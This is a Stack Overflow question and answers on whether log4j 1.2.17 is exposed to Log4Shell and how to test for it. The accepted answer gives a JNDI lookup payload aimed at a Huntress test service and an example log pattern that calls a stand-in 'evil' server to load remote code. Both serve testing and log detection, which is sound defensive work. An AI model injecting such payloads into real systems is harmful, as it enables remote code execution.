# Is log4j vulnerable? Sample code to test the vulnerability

Tags: java, log4j, log4j2

As we have seen in the news, a new zero-day exploit has been reported against the popular `Log4J2` library which can allow an attacker to remotely execute code.
In our application, we are still using the following `log4j` dependency.

```
<dependency>
    <groupId>log4j</groupId>
    <artifactId>log4j</artifactId>
    <version>1.2.17</version>
</dependency>
```

Is the issue reported only for `log4j2`? Or is it applicable for `1.2.17` version also? Is there any sample code to test the vulnerability?

Comment: "*Is log4j vulnerable?*" - According to the [CVE](https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell), only log4j2 is affected.

Comment: Log4j 1 is not affected by the new zero-day exploit. However, log4j 1 is no longer maintained, and are affected by other older CVEs. See here: https://logging.apache.org/log4j/1.2/
You should therefore upgrade anyway.

Comment: The only outstanding CVE against Log4j 1.2 (CVE-2019-17571) does not affect the most common usage of Log4j as log message producer (see [this question](https://stackoverflow.com/q/69746686/11748454)). However there might be other unknown vulnerabilities (it reached end-of-life more than 5 years ago).

Answer (score 3, accepted):

check this Question: [log4j-vulnerability - Is log4j1.2.17 vulnerable (was unable to find any jndi code in source)?](https://stackoverflow.com/questions/70310980/log4j-vulnerability-is-log4j1-2-17-vulnerable-was-unable-to-find-any-jndi-cod?rq=1)

> Update (2021-12-12 10:09 JST): according to this analysis by @TopStreamsNet, strictly speaking, applications using Log4j 1.x may be impacted if their configuration uses JNDI. However, the risk is much lower.
> Note that log4j 1.x is End of Life and has other security vulnerabilities that will not be fixed. So we do not recommend using log4j 1.x as a way to avoid this security vulnerability. The recommendation is to upgrade to 2.15.0.

and [this](https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv):

> https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301
> log4j 1.x versions can still be vulnerable to this issue, but only
> when the jms configuration: *TopicBindingName* or
> *TopicConnectionFactoryBindingName* is set to something that JNDI can handle - for example "ldap://host:port/a". In this way, JNDI will do
> exactly the same thing it does for 2.x. That is, *1.x is vulnerable,
> just attack vector is "safer" as it depends on configuration rather
> than user input.*

Is there any sample code to test the vulnerability?

you can use this online tool to test your application:
https://log4shell.huntress.com/

Simply add this line to your application that you want to test, if it has the vulnerabitlity:

```
logger.error("${jndi:ldap://log4shell.huntress.com:1389/<your-unique-identifier-from-log4shell.huntress.com>}");
```

Then run the server and check if a request was send to the tool by clicking on "View Connections".

You can also test the vulnerability with this python script:

https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Or check your logs if an attack already happened:

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

Or by just checking for strings that include `${jndi:ldap:` or just `${jndi:` in your logs like this one:

```
${jndi:ldap://<some_evil_server.com/evil-code.class...}
```

and here is an example Java application that has the vulnerability:

https://github.com/0x0021h/apache-log4j-rce

I tested it, in the logs of the running application I didn't see much interesting going on:

[image: the test application with logs]

But in my other server running on `127.0.0.1:8080` I saw following logs appear, so the log statement triggered a http request (I also tested it with the log4shell.huntress.com tool and the connection appeared there.):

```
16:48:44.338 [http-nio-8080-exec-1] INFO  o.a.coyote.http11.Http11Processor - Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name [00x0c0x020x010x01`0x070x020x010x030x040x000x800x00...]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:419)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:269)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1723)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
    at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.base/java.lang.Thread.run(Thread.java:834)
```

Comment: Can 'log4js' a node logging framework be a security threat too. ?? If yes , My node application is using 'karma' as a devdependency and 'log4js' is a nested dependency inside karma. Can this pose any security threat to my application. If yes how can I mitigate this ??? I am using karma to run test cases locally.

Comment: log4js should not be affected by the log4j vulnerability, but just to be sure I wanted to test what happens when you try the attack with a log4js logger. I created this stackblitz, but I just can't get the log4js run in Angular (: https://stackblitz.com/edit/angular-ivy-wy36bb?devtoolsheight=33&file=src/app/app.component.ts. I also tried this https://stritti.github.io/log4js/docu/users-guide.html, but I only get the error `Log4js is not defined`